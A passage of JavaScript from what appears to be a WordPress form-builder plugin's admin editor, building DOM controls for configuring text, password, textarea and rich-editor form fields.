		el_size.setAttribute("id", "edit_for_input_size");
		el_size.setAttribute("type", "text");
		el_size.setAttribute("value", w_size);
		el_size.setAttribute("onKeyPress", "return check_isnum(event)");
        el_size.setAttribute("onKeyUp", "change_w_style('"+i+"_elementform_id_temp', this.value)");

	var el_required_label = document.createElement('label');
		el_required_label.setAttribute("class", "fm-field-label");
	    el_required_label.setAttribute("for", "el_required");
		el_required_label.innerHTML = "Required";
	
	var el_required = document.createElement('input');
        el_required.setAttribute("id", "el_required");
        el_required.setAttribute("type", "checkbox");
        el_required.setAttribute("onclick", "set_required('"+i+"_required')");
	if(w_required=="yes")
		el_required.setAttribute("checked", "checked");
			
	var el_unique_label = document.createElement('label');
		el_unique_label.setAttribute("class", "fm-field-label");
	    el_unique_label.setAttribute("for", "el_unique");
		el_unique_label.innerHTML = "Allow only unique values";
	
	var el_unique = document.createElement('input');
        el_unique.setAttribute("id", "el_unique");
        el_unique.setAttribute("type", "checkbox");
        el_unique.setAttribute("onclick", "set_unique('"+i+"_uniqueform_id_temp')");
	if(w_unique=="yes")
        el_unique.setAttribute("checked", "checked");
				
	var el_style_label = document.createElement('label');
		el_style_label.setAttribute("class", "fm-field-label");
	    el_style_label.setAttribute("for", "el_style_textarea");
		el_style_label.innerHTML = "Class name";
	
	var el_style_textarea = document.createElement('input');
        el_style_textarea.setAttribute("id", "el_style_textarea");
		el_style_textarea.setAttribute("type", "text");
		el_style_textarea.setAttribute("value", w_class);
        
        el_style_textarea.setAttribute("onChange", "change_class(this.value,'"+i+"')");
		
	var el_attr_label = document.createElement('label');
		el_attr_label.setAttribute("class", "fm-field-label");
		el_attr_label.innerHTML = "Additional Attributes";
		
	var el_attr_add = document.createElement('img');
        el_attr_add.setAttribute("src", plugin_url + '/images/add.png?ver=1.8.0');
        el_attr_add.style.cssText = 'cursor:pointer; margin-left:68px';
        el_attr_add.setAttribute("title", 'add');
        el_attr_add.setAttribute("onClick", "add_attr("+i+", 'type_text')");
	var el_attr_table = document.createElement('table');
        el_attr_table.setAttribute("id", 'attributes');
        el_attr_table.setAttribute("border", '0');
        el_attr_table.style.cssText = 'margin-left:0px';
	var el_attr_tr_label = document.createElement('tr');
        el_attr_tr_label.setAttribute("idi", '0');
	var el_attr_td_name_label = document.createElement('th');
      	el_attr_td_name_label.style.cssText = 'width:100px';
	var el_attr_td_value_label = document.createElement('th');
       	el_attr_td_value_label.style.cssText = 'width:100px';
	var el_attr_td_X_label = document.createElement('th');
      	el_attr_td_X_label.style.cssText = 'width:10px';
	var el_attr_name_label = document.createElement('label');
	    el_attr_name_label.style.cssText ="color:#000; font-weight:bold; font-size: 11px";
		el_attr_name_label.innerHTML = "Name";
	var el_attr_value_label = document.createElement('label');
	    el_attr_value_label.style.cssText ="color:#000; font-weight:bold; font-size: 11px";
		el_attr_value_label.innerHTML = "Value";
			
	el_attr_table.appendChild(el_attr_tr_label);
	el_attr_tr_label.appendChild(el_attr_td_name_label);
	el_attr_tr_label.appendChild(el_attr_td_value_label);
	el_attr_tr_label.appendChild(el_attr_td_X_label);
	el_attr_td_name_label.appendChild(el_attr_name_label);
	el_attr_td_value_label.appendChild(el_attr_value_label);
	
	n=w_attr_name.length;
	for(j=1; j<=n; j++)
	{	
		var el_attr_tr = document.createElement('tr');
			el_attr_tr.setAttribute("id", "attr_row_"+j);
			el_attr_tr.setAttribute("idi", j);
		var el_attr_td_name = document.createElement('td');
			el_attr_td_name.style.cssText = 'width:100px';
		var el_attr_td_value = document.createElement('td');
			el_attr_td_value.style.cssText = 'width:100px';
		
		var el_attr_td_X = document.createElement('td');
		var el_attr_name = document.createElement('input');
			el_attr_name.setAttribute("type", "text");
			el_attr_name.setAttribute("class", "fm-field-choice");
			el_attr_name.setAttribute("value", w_attr_name[j-1]);
			el_attr_name.setAttribute("id", "attr_name"+j);
			el_attr_name.setAttribute("onChange", "change_attribute_name("+i+", this, 'type_text')");
			
		var el_attr_value = document.createElement('input');
			el_attr_value.setAttribute("type", "text");
			el_attr_value.setAttribute("class", "fm-field-choice");
			el_attr_value.setAttribute("value", w_attr_value[j-1]);
			el_attr_value.setAttribute("id", "attr_value"+j);
			el_attr_value.setAttribute("onChange", "change_attribute_value("+i+", "+j+", 'type_text')");
	
		var el_attr_remove = document.createElement('img');
			el_attr_remove.setAttribute("id", "el_choices"+j+"_remove");
			el_attr_remove.setAttribute("src", plugin_url + '/images/delete.png?ver=1.8.0');
			el_attr_remove.style.cssText = 'cursor:pointer; vertical-align:middle; margin:2px';
			
			el_attr_remove.setAttribute("onClick", "remove_attr("+j+", "+i+", 'type_text')");
		el_attr_table.appendChild(el_attr_tr);
		el_attr_tr.appendChild(el_attr_td_name);
		el_attr_tr.appendChild(el_attr_td_value);
		el_attr_tr.appendChild(el_attr_td_X);
		el_attr_td_name.appendChild(el_attr_name);
		el_attr_td_value.appendChild(el_attr_value);
		el_attr_td_X.appendChild(el_attr_remove);
		
	}

	var t  = document.getElementById('edit_table');
	
	var br = document.createElement('br');
	var br3 = document.createElement('br');
	
	edit_main_td1.appendChild(el_label_label);
	edit_main_td1_1.appendChild(el_label_textarea);

	edit_main_td8.appendChild(el_label_size_label);
	edit_main_td8_1.appendChild(el_label_size);
	
	edit_main_td2.appendChild(el_label_position_label);
	edit_main_td2_1.appendChild(el_label_position1);
	edit_main_td2_1.appendChild(el_label_left);
	edit_main_td2_1.appendChild(br);
	edit_main_td2_1.appendChild(el_label_position2);
	edit_main_td2_1.appendChild(el_label_top);
	
	edit_main_td3.appendChild(el_size_label);
	edit_main_td3_1.appendChild(el_size);
	
	edit_main_td4.appendChild(el_style_label);
	edit_main_td4_1.appendChild(el_style_textarea);
	
	edit_main_td5.appendChild(el_required_label);
	edit_main_td5_1.appendChild(el_required);
	
	edit_main_td7.appendChild(el_unique_label);
	edit_main_td7_1.appendChild(el_unique);


	edit_main_td6.appendChild(el_attr_label);
	edit_main_td6.appendChild(el_attr_add);
	edit_main_td6.appendChild(br3);
	edit_main_td6.appendChild(el_attr_table);
	edit_main_td6.setAttribute("colspan", "2");

	
	edit_main_tr1.appendChild(edit_main_td1);
	edit_main_tr1.appendChild(edit_main_td1_1);
	edit_main_tr8.appendChild(edit_main_td8);
	edit_main_tr8.appendChild(edit_main_td8_1);
	edit_main_tr2.appendChild(edit_main_td2);
	edit_main_tr2.appendChild(edit_main_td2_1);
	edit_main_tr3.appendChild(edit_main_td3);
	edit_main_tr3.appendChild(edit_main_td3_1);
	edit_main_tr4.appendChild(edit_main_td4);
	edit_main_tr4.appendChild(edit_main_td4_1);
	edit_main_tr5.appendChild(edit_main_td5);
	edit_main_tr5.appendChild(edit_main_td5_1);
	edit_main_tr6.appendChild(edit_main_td6);
	edit_main_tr7.appendChild(edit_main_td7);
	edit_main_tr7.appendChild(edit_main_td7_1);
	edit_main_table.appendChild(edit_main_tr1);
	edit_main_table.appendChild(edit_main_tr8);
	edit_main_table.appendChild(edit_main_tr2);
	edit_main_table.appendChild(edit_main_tr3);
	edit_main_table.appendChild(edit_main_tr4);
	edit_main_table.appendChild(edit_main_tr5);
	edit_main_table.appendChild(edit_main_tr7);
	edit_main_table.appendChild(edit_main_tr6);
	edit_div.appendChild(edit_main_table);
	
	t.appendChild(edit_div);
	add_id_and_name(i, 'type_text');

//show table

	element='input';	type='password'; 
	var adding_type = document.createElement("input");
            adding_type.setAttribute("type", "hidden");
            adding_type.setAttribute("value", "type_password");
            adding_type.setAttribute("name", i+"_typeform_id_temp");
            adding_type.setAttribute("id", i+"_typeform_id_temp");
	var adding_required= document.createElement("input");
            adding_required.setAttribute("type", "hidden");
            adding_required.setAttribute("value", w_required);
            adding_required.setAttribute("name", i+"_requiredform_id_temp");
            adding_required.setAttribute("id", i+"_requiredform_id_temp");
			
	var adding_unique= document.createElement("input");
            adding_unique.setAttribute("type", "hidden");
            adding_unique.setAttribute("value", w_unique);
            adding_unique.setAttribute("name", i+"_uniqueform_id_temp");
            adding_unique.setAttribute("id", i+"_uniqueform_id_temp");

	var adding = document.createElement(element);
			adding.setAttribute("type", type);
			adding.setAttribute("id", i+"_elementform_id_temp");
			adding.setAttribute("name", i+"_elementform_id_temp");
			adding.style.cssText = "width:"+w_size+"px;";
		
			
     	var div = document.createElement('div');
      	    div.setAttribute("id", "main_div");
		
      	var div_field = document.createElement('div');
           	div_field.setAttribute("id", i+"_elemet_tableform_id_temp");
						
      	var div_label = document.createElement('div');
         	div_label.setAttribute("align", 'left');
         	div_label.style.display="table-cell";
			div_label.style.width= w_field_label_size+"px";
           	div_label.setAttribute("id", i+"_label_sectionform_id_temp");
			
      	var div_element = document.createElement('div');
         	div_element.setAttribute("align", 'left');
          	div_element.style.display="table-cell";
          	div_element.setAttribute("id", i+"_element_sectionform_id_temp");

      	var label = document.createElement('span');
			label.setAttribute("id", i+"_element_labelform_id_temp");
			label.innerHTML = w_field_label;
			label.setAttribute("class", "label");
			label.style.verticalAlign="top";
	    
      	var required = document.createElement('span');
			required.setAttribute("id", i+"_required_elementform_id_temp");
			required.innerHTML = "";
			required.setAttribute("class", "required");
			required.style.verticalAlign="top";
	if(w_required=="yes")
			required.innerHTML = " *";
      	var main_td  = document.getElementById('show_table');
	
      
      	div_label.appendChild(label);
      	div_label.appendChild(required);
      	div_element.appendChild(adding_type);
      	div_element.appendChild(adding_required);
       	div_element.appendChild(adding_unique);
     	div_element.appendChild(adding);
      	div_field.appendChild(div_label);
      	div_field.appendChild(div_element);
		
      	div.appendChild(div_field);
      	main_td.appendChild(div);
	if(w_field_label_pos=="top")
				label_top(i);
change_class(w_class, i);
refresh_attr(i, 'type_text');
}

function type_textarea(i, w_field_label, w_field_label_size, w_field_label_pos, w_size_w, w_size_h, w_first_val, w_title, w_required, w_unique, w_class, w_attr_name, w_attr_value){
    
	document.getElementById("element_type").value="type_textarea";
	delete_last_child();

	var edit_div  = document.createElement('div');
		edit_div.setAttribute("id", "edit_div");
		
	var edit_main_table  = document.createElement('table');
		edit_main_table.setAttribute("id", "edit_main_table");
		edit_main_table.setAttribute("cellpadding", "3");
		edit_main_table.setAttribute("cellspacing", "0");
		
	var edit_main_tr1  = document.createElement('tr');
	var edit_main_tr2  = document.createElement('tr');
	var edit_main_tr3  = document.createElement('tr');
	var edit_main_tr4  = document.createElement('tr');
	var edit_main_tr5  = document.createElement('tr');
	var edit_main_tr6  = document.createElement('tr');
	var edit_main_tr7  = document.createElement('tr');
	var edit_main_tr8  = document.createElement('tr');
	var edit_main_tr9  = document.createElement('tr');
	var edit_main_td1 = document.createElement('td');
	var edit_main_td1_1 = document.createElement('td');
	var edit_main_td2 = document.createElement('td');
	var edit_main_td2_1 = document.createElement('td');
	var edit_main_td3 = document.createElement('td');
	var edit_main_td3_1 = document.createElement('td');
	var edit_main_td4 = document.createElement('td');
	var edit_main_td4_1 = document.createElement('td');
	var edit_main_td5 = document.createElement('td');
	var edit_main_td5_1 = document.createElement('td');
	var edit_main_td6 = document.createElement('td');
	var edit_main_td6_1 = document.createElement('td');
	var edit_main_td7 = document.createElement('td');
	var edit_main_td7_1 = document.createElement('td');
	var edit_main_td8 = document.createElement('td');
	var edit_main_td8_1 = document.createElement('td');
	var edit_main_td9 = document.createElement('td');
	var edit_main_td9_1 = document.createElement('td');
		  
	var el_label_label = document.createElement('label');
		el_label_label.setAttribute("class", "fm-field-label");
		el_label_label.setAttribute("for", "edit_for_label");
		el_label_label.innerHTML = "Field label";
	
	var el_label_textarea = document.createElement('textarea');
        el_label_textarea.setAttribute("id", "edit_for_label");
        el_label_textarea.setAttribute("rows", "4");
        
        el_label_textarea.setAttribute("onKeyUp", "change_label('"+i+"_element_labelform_id_temp', this.value)");
		el_label_textarea.innerHTML = w_field_label;
	
	var el_label_size_label = document.createElement('label');
		el_label_size_label.setAttribute("class", "fm-field-label");
	    el_label_size_label.setAttribute("for", "edit_for_label_size");
		el_label_size_label.innerHTML = "Field label size(px) ";
		
	var el_label_size = document.createElement('input');
	    el_label_size.setAttribute("id", "edit_for_label_size");
	    el_label_size.setAttribute("type", "text");
	    el_label_size.setAttribute("value", w_field_label_size);
		el_label_size.setAttribute("onKeyPress", "return check_isnum(event)");
        el_label_size.setAttribute("onKeyUp", "change_w_style('"+i+"_label_sectionform_id_temp', this.value)");
	
	var el_label_position_label = document.createElement('label');
		el_label_position_label.setAttribute("class", "fm-field-label");
		el_label_position_label.innerHTML = "Field label position";

	var el_label_position1 = document.createElement('input');
		el_label_position1.setAttribute("id", "edit_for_label_position_top");
		el_label_position1.setAttribute("type", "radio");
		el_label_position1.setAttribute("name", "edit_for_label_position");
		el_label_position1.setAttribute("onchange", "label_left("+i+")");

	var el_label_left = document.createElement('label');
		el_label_left.setAttribute("for", "edit_for_label_position_top");
		el_label_left.innerHTML = "Left";	

	var el_label_position2 = document.createElement('input');
		el_label_position2.setAttribute("id", "edit_for_label_position_left");
		el_label_position2.setAttribute("type", "radio");
		el_label_position2.setAttribute("name", "edit_for_label_position");
		el_label_position2.setAttribute("onchange", "label_top("+i+")");

	var el_label_top = document.createElement('label');
		el_label_top.setAttribute("for", "edit_for_label_position_left");
		el_label_top.innerHTML = "Top";

	if(w_field_label_pos == "top")
		el_label_position2.setAttribute("checked", "checked");
	else
		el_label_position1.setAttribute("checked", "checked");

	var el_size_label = document.createElement('label');
		el_size_label.setAttribute("class", "fm-field-label");
	    el_size_label.setAttribute("for", "edit_for_input_size");
		el_size_label.innerHTML = "Field size(px) ";
		
	var el_size_w = document.createElement('input');
		el_size_w.setAttribute("id", "edit_for_input_size");
		el_size_w.setAttribute("type", "text");
		el_size_w.setAttribute("value", w_size_w);
		el_size_w.style.cssText = "margin-right:2px; width: 60px";
		el_size_w.setAttribute("onKeyPress", "return check_isnum(event)");
        el_size_w.setAttribute("onKeyUp", "change_w_style('"+i+"_elementform_id_temp', this.value)");
		   
		X = document.createTextNode("x");
		
	var el_size_h = document.createElement('input');
		el_size_h.setAttribute("id", "edit_for_input_size");
		el_size_h.setAttribute("type", "text");
		el_size_h.setAttribute("value", w_size_h);
		el_size_h.style.cssText = "margin-left:2px;  width:60px";
		el_size_h.setAttribute("onKeyPress", "return check_isnum(event)");
        el_size_h.setAttribute("onKeyUp", "change_h_style('"+i+"_elementform_id_temp', this.value)");
		
	var el_first_value_label = document.createElement('label');
		el_first_value_label.setAttribute("class", "fm-field-label");
	    el_first_value_label.setAttribute("for", "el_first_value_input");
		el_first_value_label.innerHTML = "Value if empty";
	
	var el_first_value_input = document.createElement('input');
                el_first_value_input.setAttribute("id", "el_first_value_input");
                el_first_value_input.setAttribute("type", "text");
                el_first_value_input.setAttribute("value", w_title);
                
                el_first_value_input.setAttribute("onKeyUp", "change_input_value(this.value,'"+i+"_elementform_id_temp')");
				
	var el_required_label = document.createElement('label');
		el_required_label.setAttribute("class", "fm-field-label");
	    el_required_label.setAttribute("for", "el_required");
		el_required_label.innerHTML = "Required";
	
	var el_required = document.createElement('input');
                el_required.setAttribute("id", "el_required");
                el_required.setAttribute("type", "checkbox");
                el_required.setAttribute("onclick", "set_required('"+i+"_required')");
	if(w_required=="yes")
			    el_required.setAttribute("checked", "checked");
		
	var el_unique_label = document.createElement('label');
		el_unique_label.setAttribute("class", "fm-field-label");
	    el_unique_label.setAttribute("for", "el_unique");
		el_unique_label.innerHTML = "Allow only unique values";
	
	var el_unique = document.createElement('input');
                el_unique.setAttribute("id", "el_unique");
                el_unique.setAttribute("type", "checkbox");
                el_unique.setAttribute("onclick", "set_unique('"+i+"_uniqueform_id_temp')");
	if(w_unique=="yes")
                el_unique.setAttribute("checked", "checked");
		
	var el_style_label = document.createElement('label');
		el_style_label.setAttribute("class", "fm-field-label");
	        el_style_label.setAttribute("for", "el_style_textarea");
			el_style_label.innerHTML = "Class name";
	
	var el_style_textarea = document.createElement('input');
                el_style_textarea.setAttribute("id", "el_style_textarea");
				el_style_textarea.setAttribute("type", "text");
				el_style_textarea.setAttribute("value", w_class);
                
                el_style_textarea.setAttribute("onChange", "change_class(this.value,'"+i+"')");

	var el_attr_label = document.createElement('label');
		el_attr_label.setAttribute("class", "fm-field-label");
		el_attr_label.innerHTML = "Additional Attributes";
			
	var el_attr_add = document.createElement('img');
           	el_attr_add.setAttribute("src", plugin_url + '/images/add.png?ver=1.8.0');
            	el_attr_add.style.cssText = 'cursor:pointer; margin-left:68px';
            	el_attr_add.setAttribute("title", 'add');
                el_attr_add.setAttribute("onClick", "add_attr("+i+", 'type_text')");
	var el_attr_table = document.createElement('table');
                el_attr_table.setAttribute("id", 'attributes');
                el_attr_table.setAttribute("border", '0');
        	el_attr_table.style.cssText = 'margin-left:0px';
	var el_attr_tr_label = document.createElement('tr');
                el_attr_tr_label.setAttribute("idi", '0');
	var el_attr_td_name_label = document.createElement('th');
            	el_attr_td_name_label.style.cssText = 'width:100px';
	var el_attr_td_value_label = document.createElement('th');
            	el_attr_td_value_label.style.cssText = 'width:100px';
	var el_attr_td_X_label = document.createElement('th');
            	el_attr_td_X_label.style.cssText = 'width:10px';
	var el_attr_name_label = document.createElement('label');
	                el_attr_name_label.style.cssText ="color:#000; font-weight:bold; font-size: 11px";
			el_attr_name_label.innerHTML = "Name";
	var el_attr_value_label = document.createElement('label');
	                el_attr_value_label.style.cssText ="color:#000; font-weight:bold; font-size: 11px";
			el_attr_value_label.innerHTML = "Value";
			
	el_attr_table.appendChild(el_attr_tr_label);
	el_attr_tr_label.appendChild(el_attr_td_name_label);
	el_attr_tr_label.appendChild(el_attr_td_value_label);
	el_attr_tr_label.appendChild(el_attr_td_X_label);
	el_attr_td_name_label.appendChild(el_attr_name_label);
	el_attr_td_value_label.appendChild(el_attr_value_label);
	
	n=w_attr_name.length;
	for(j=1; j<=n; j++)
	{	
		var el_attr_tr = document.createElement('tr');
			el_attr_tr.setAttribute("id", "attr_row_"+j);
			el_attr_tr.setAttribute("idi", j);
		var el_attr_td_name = document.createElement('td');
			el_attr_td_name.style.cssText = 'width:100px';
		var el_attr_td_value = document.createElement('td');
			el_attr_td_value.style.cssText = 'width:100px';
		
		var el_attr_td_X = document.createElement('td');
		var el_attr_name = document.createElement('input');
			el_attr_name.setAttribute("type", "text");
			el_attr_name.setAttribute("class", "fm-field-choice");
			el_attr_name.setAttribute("value", w_attr_name[j-1]);
			el_attr_name.setAttribute("id", "attr_name"+j);
			el_attr_name.setAttribute("onChange", "change_attribute_name("+i+", this, 'type_text')");
			
		var el_attr_value = document.createElement('input');
			el_attr_value.setAttribute("type", "text");
			el_attr_value.setAttribute("class", "fm-field-choice");
			el_attr_value.setAttribute("value", w_attr_value[j-1]);
			el_attr_value.setAttribute("id", "attr_value"+j);
			el_attr_value.setAttribute("onChange", "change_attribute_value("+i+", "+j+", 'type_text')");
	
		var el_attr_remove = document.createElement('img');
			el_attr_remove.setAttribute("id", "el_choices"+j+"_remove");
			el_attr_remove.setAttribute("src", plugin_url + '/images/delete.png?ver=1.8.0');
			el_attr_remove.style.cssText = 'cursor:pointer; vertical-align:middle; margin:2px';
			
			el_attr_remove.setAttribute("onClick", "remove_attr("+j+", "+i+", 'type_text')");
		el_attr_table.appendChild(el_attr_tr);
		el_attr_tr.appendChild(el_attr_td_name);
		el_attr_tr.appendChild(el_attr_td_value);
		el_attr_tr.appendChild(el_attr_td_X);
		el_attr_td_name.appendChild(el_attr_name);
		el_attr_td_value.appendChild(el_attr_value);
		el_attr_td_X.appendChild(el_attr_remove);
		
	}

	var t  = document.getElementById('edit_table');
	
	var br = document.createElement('br');
	var br6 = document.createElement('br');
	
	edit_main_td1.appendChild(el_label_label);
	edit_main_td1_1.appendChild(el_label_textarea);
	
	edit_main_td9.appendChild(el_label_size_label);
	edit_main_td9_1.appendChild(el_label_size);

	edit_main_td2.appendChild(el_label_position_label);
	edit_main_td2_1.appendChild(el_label_position1);
	edit_main_td2_1.appendChild(el_label_left);
	edit_main_td2_1.appendChild(br);
	edit_main_td2_1.appendChild(el_label_position2);
	edit_main_td2_1.appendChild(el_label_top);
	
	edit_main_td3.appendChild(el_size_label);
	edit_main_td3_1.appendChild(el_size_w);
	edit_main_td3_1.appendChild(X);
	edit_main_td3_1.appendChild(el_size_h);
	
	edit_main_td4.appendChild(el_first_value_label);
	edit_main_td4_1.appendChild(el_first_value_input);
	
	edit_main_td5.appendChild(el_style_label);
	edit_main_td5_1.appendChild(el_style_textarea);
	
	edit_main_td6.appendChild(el_required_label);
	edit_main_td6_1.appendChild(el_required);
	
	edit_main_td8.appendChild(el_unique_label);
	edit_main_td8_1.appendChild(el_unique);

	
	
	
	edit_main_td7.appendChild(el_attr_label);
	edit_main_td7.appendChild(el_attr_add);
	edit_main_td7.appendChild(br6);
	edit_main_td7.appendChild(el_attr_table);
	edit_main_td7.setAttribute("colspan", "2");

	edit_main_tr1.appendChild(edit_main_td1);
	edit_main_tr1.appendChild(edit_main_td1_1);
	edit_main_tr9.appendChild(edit_main_td9);
	edit_main_tr9.appendChild(edit_main_td9_1);
	edit_main_tr2.appendChild(edit_main_td2);
	edit_main_tr2.appendChild(edit_main_td2_1);
	edit_main_tr3.appendChild(edit_main_td3);
	edit_main_tr3.appendChild(edit_main_td3_1);
	edit_main_tr4.appendChild(edit_main_td4);
	edit_main_tr4.appendChild(edit_main_td4_1);
	edit_main_tr5.appendChild(edit_main_td5);
	edit_main_tr5.appendChild(edit_main_td5_1);
	edit_main_tr6.appendChild(edit_main_td6);
	edit_main_tr6.appendChild(edit_main_td6_1);
	edit_main_tr7.appendChild(edit_main_td7);
	edit_main_tr7.appendChild(edit_main_td7_1);
	edit_main_tr8.appendChild(edit_main_td8);
	edit_main_tr8.appendChild(edit_main_td8_1);
	edit_main_table.appendChild(edit_main_tr1);
	edit_main_table.appendChild(edit_main_tr9);
	edit_main_table.appendChild(edit_main_tr2);
	edit_main_table.appendChild(edit_main_tr3);
	edit_main_table.appendChild(edit_main_tr4);
	edit_main_table.appendChild(edit_main_tr5);
	edit_main_table.appendChild(edit_main_tr6);
	edit_main_table.appendChild(edit_main_tr8);
	edit_main_table.appendChild(edit_main_tr7);
	edit_div.appendChild(edit_main_table);
	
	t.appendChild(edit_div);
	add_id_and_name(i, 'type_text');

//show table

	element='textarea';
	var adding_type = document.createElement("input");
            adding_type.setAttribute("type", "hidden");
            adding_type.setAttribute("value", "type_textarea");
            adding_type.setAttribute("name", i+"_typeform_id_temp");
            adding_type.setAttribute("id", i+"_typeform_id_temp");
	var adding_required= document.createElement("input");
            adding_required.setAttribute("type", "hidden");
            adding_required.setAttribute("value", w_required);
            adding_required.setAttribute("name", i+"_requiredform_id_temp");			
            adding_required.setAttribute("id", i+"_requiredform_id_temp");
			
	var adding_unique= document.createElement("input");
            adding_unique.setAttribute("type", "hidden");
            adding_unique.setAttribute("value", w_unique);
            adding_unique.setAttribute("name", i+"_uniqueform_id_temp");
            adding_unique.setAttribute("id", i+"_uniqueform_id_temp");
			
		var div = document.createElement('div');
			div.setAttribute("id", "main_div");
			
      	var div_field = document.createElement('div');
           	div_field.setAttribute("id", i+"_elemet_tableform_id_temp");
						
      	var div_label = document.createElement('div');
         	div_label.setAttribute("align", 'left');
         	div_label.style.display="table-cell";
          div_label.style.width=w_field_label_size+"px";
          div_label.style.verticalAlign = "top";
           	div_label.setAttribute("id", i+"_label_sectionform_id_temp");
			
      	var div_element = document.createElement('div');
         	div_element.setAttribute("align", 'left');
         	div_element.style.display="table-cell";
          	div_element.setAttribute("id", i+"_element_sectionform_id_temp");
			
      	var label = document.createElement('span');
			label.setAttribute("id", i+"_element_labelform_id_temp");
			label.innerHTML = w_field_label;
			label.setAttribute("class", "label");
			label.style.verticalAlign="top";
	    
      	var required = document.createElement('span');
			required.setAttribute("id", i+"_required_elementform_id_temp");
			required.innerHTML = "";
			required.setAttribute("class", "required");
			required.style.verticalAlign="top";
	if(w_required=="yes")
			required.innerHTML = " *";
	var adding = document.createElement(element);
		if(w_title==w_first_val)
		{
			adding.style.cssText = "width:"+w_size_w+"px; height:"+w_size_h+"px;";
			adding.setAttribute("class", "input_deactive");
		}
		else
		{
			adding.style.cssText = "width:"+w_size_w+"px; height:"+w_size_h+"px;";
			adding.setAttribute("class", "input_active");
		}
		adding.setAttribute("id", i+"_elementform_id_temp");
		adding.setAttribute("name", i+"_elementform_id_temp");
		adding.setAttribute("title", w_title);
		adding.setAttribute("value",w_first_val);
		adding.setAttribute("onFocus", "delete_value('"+i+"_elementform_id_temp')");
		adding.setAttribute("onBlur", "return_value('"+i+"_elementform_id_temp')");
		adding.setAttribute("onChange", "change_value('"+i+"_elementform_id_temp')");
		adding.innerHTML=w_first_val;
		
		var main_td  = document.getElementById('show_table');
      
      	div_label.appendChild(label);
      	div_label.appendChild(required);
      	div_element.appendChild(adding_type);
      	div_element.appendChild(adding_required);
      	div_element.appendChild(adding_unique);
      	div_element.appendChild(adding);
      	div_field.appendChild(div_label);
      	div_field.appendChild(div_element);
      
      	div.appendChild(div_field);
      	main_td.appendChild(div);
	if(w_field_label_pos=="top")
				label_top(i);
change_class(w_class, i);
refresh_attr(i, 'type_text');
}

function type_wdeditor(i, w_field_label,  w_field_label_size, w_field_label_pos, w_size_w, w_size_h, w_title, w_required, w_class, w_attr_name, w_attr_value){
    
	document.getElementById("element_type").value="type_wdeditor";

	delete_last_child();
// edit table	
	var edit_div  = document.createElement('div');
		edit_div.setAttribute("id", "edit_div");
		
		
	var edit_main_table  = document.createElement('table');
		edit_main_table.setAttribute("id", "edit_main_table");
		edit_main_table.setAttribute("cellpadding", "3");
		edit_main_table.setAttribute("cellspacing", "0");
		
	var edit_main_tr1  = document.createElement('tr');
      	var edit_main_tr2  = document.createElement('tr');

	var edit_main_tr3  = document.createElement('tr');
  	var edit_main_tr4  = document.createElement('tr');
	
	var edit_main_tr5  = document.createElement('tr');
	var edit_main_tr6  = document.createElement('tr');

	var edit_main_tr7  = document.createElement('tr');


	var edit_main_tr8  = document.createElement('tr');


	var edit_main_td1 = document.createElement('td');
	var edit_main_td1_1 = document.createElement('td');	
	var edit_main_td2 = document.createElement('td');
	var edit_main_td2_1 = document.createElement('td');var edit_main_td3 = document.createElement('td');
	var edit_main_td3_1 = document.createElement('td');
		edit_main_td3_1.style.cssText = "padding-top:10px";
	var edit_main_td4 = document.createElement('td');
	var edit_main_td4_1 = document.createElement('td');
		edit_main_td4_1.style.cssText = "padding-top:10px";
		
	var edit_main_td5 = document.createElement('td');
	var edit_main_td5_1 = document.createElement('td');
		edit_main_td5_1.style.cssText = "padding-top:10px";
				
	var edit_main_td6 = document.createElement('td');
	var edit_main_td6_1 = document.createElement('td');
		edit_main_td6_1.style.cssText = "padding-top:10px";

	var edit_main_td7 = document.createElement('td');
	var edit_main_td7_1 = document.createElement('td');
		  
	var edit_main_td8 = document.createElement('td');
	var edit_main_td8_1 = document.createElement('td');
		  
	var el_label_label = document.createElement('label');
			        el_label_label.setAttribute("class", "fm-field-label");
		el_label_label.setAttribute("for", "edit_for_label");
			el_label_label.innerHTML = "Field label";
	
	var el_label_textarea = document.createElement('textarea');
                el_label_textarea.setAttribute("id", "edit_for_label");
                el_label_textarea.setAttribute("rows", "4");
                
                el_label_textarea.setAttribute("onKeyUp", "change_label('"+i+"_element_labelform_id_temp', this.value)");
				el_label_textarea.innerHTML = w_field_label;
	
	var el_label_size_label = document.createElement('label');
		el_label_size_label.setAttribute("class", "fm-field-label");
	    el_label_size_label.setAttribute("for", "edit_for_label_size");
		el_label_size_label.innerHTML = "Field label size(px) ";
		
	var el_label_size = document.createElement('input');
	    el_label_size.setAttribute("id", "edit_for_label_size");
	    el_label_size.setAttribute("type", "text");
	    el_label_size.setAttribute("value", w_field_label_size);
		el_label_size.setAttribute("onKeyPress", "return check_isnum(event)");
        el_label_size.setAttribute("onKeyUp", "change_w_style('"+i+"_label_sectionform_id_temp', this.value)");
	
	var el_label_position_label = document.createElement('label');
			        el_label_position_label.setAttribute("class", "fm-field-label");
	    el_label_position_label.setAttribute("for", "edit_for_label_position_top");
		el_label_position_label.innerHTML = "Field label position";
	
	var el_label_position1 = document.createElement('input');
                el_label_position1.setAttribute("id", "edit_for_label_position_top");
                el_label_position1.setAttribute("type", "radio");
                el_label_position1.setAttribute("value", "left");
                

                el_label_position1.setAttribute("name", "edit_for_label_position");
                el_label_position1.setAttribute("onchange", "label_left("+i+")");
		Left = document.createTextNode("Left");
		
	var el_label_position2 = document.createElement('input');
                el_label_position2.setAttribute("id", "edit_for_label_position_left");
                el_label_position2.setAttribute("type", "radio");
                el_label_position2.setAttribute("value", "top");
	

                el_label_position2.setAttribute("name", "edit_for_label_position");
                el_label_position2.setAttribute("onchange", "label_top("+i+")");
		Top = document.createTextNode("Top");
		
	if(w_field_label_pos=="top")
				el_label_position2.setAttribute("checked", "checked");
	else
				el_label_position1.setAttribute("checked", "checked");

	var el_size_label = document.createElement('label');
	        el_size_label.style.cssText ="color:#000; font-weight:bold; font-size: 13px";
		el_size_label.innerHTML = "Field size(px) ";
		
	var el_size_w = document.createElement('input');
		   el_size_w.setAttribute("id", "edit_for_input_size");
		   el_size_w.setAttribute("type", "text");
		   el_size_w.setAttribute("value", w_size_w);
		   el_size_w.style.cssText = "margin-right:2px; width: 60px";
		   el_size_w.setAttribute("name", "edit_for_size");
		   el_size_w.setAttribute("onKeyPress", "return check_isnum(event)");
           el_size_w.setAttribute("onKeyUp", "change_w_style('"+i+"_elementform_id_temp', this.value)");
		   
		X = document.createTextNode("x");
		
	var el_size_h = document.createElement('input');
		   el_size_h.setAttribute("id", "edit_for_input_size");
		   el_size_h.setAttribute("type", "text");
		   el_size_h.setAttribute("value", w_size_h);
		   el_size_h.style.cssText = "margin-left:2px;  width:60px";
			el_size_h.setAttribute("name", "edit_for_size");
